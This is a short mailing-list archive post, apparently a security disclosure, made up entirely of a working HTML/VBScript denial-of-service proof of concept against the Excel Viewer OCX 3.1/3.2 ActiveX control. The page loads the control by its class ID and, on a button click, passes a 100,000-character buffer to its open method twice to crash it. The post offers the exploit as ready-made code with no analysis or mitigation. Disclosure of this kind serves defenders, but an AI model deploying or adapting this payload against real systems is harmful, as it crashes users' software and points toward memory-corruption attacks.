<<< Date Index >>>     <<< Thread Index >>>

Excel Viewer OCX 3.1/3.2 Denial of Service PoC



<html>
<title>Excel Viewer OCX 3.1/3.2 Denial of Service PoC</title>
<br> Excel Viewer OCX 3.1/3.2 Denial of Service PoC</br>
<br> By ALpHaNiX </br>
<br> NullArea.Net</br>
<br></br>
<BODY>
 <object id=alpha 
classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object>
<script language='vbscript'>
 Sub Boom
  on error resume next
    buff = String(100000, "A")
    alpha.open buff
    alpha.open buff
 End Sub
</script>
<input type=button onclick=Boom() value='BooM !'>

</body>
</HTML>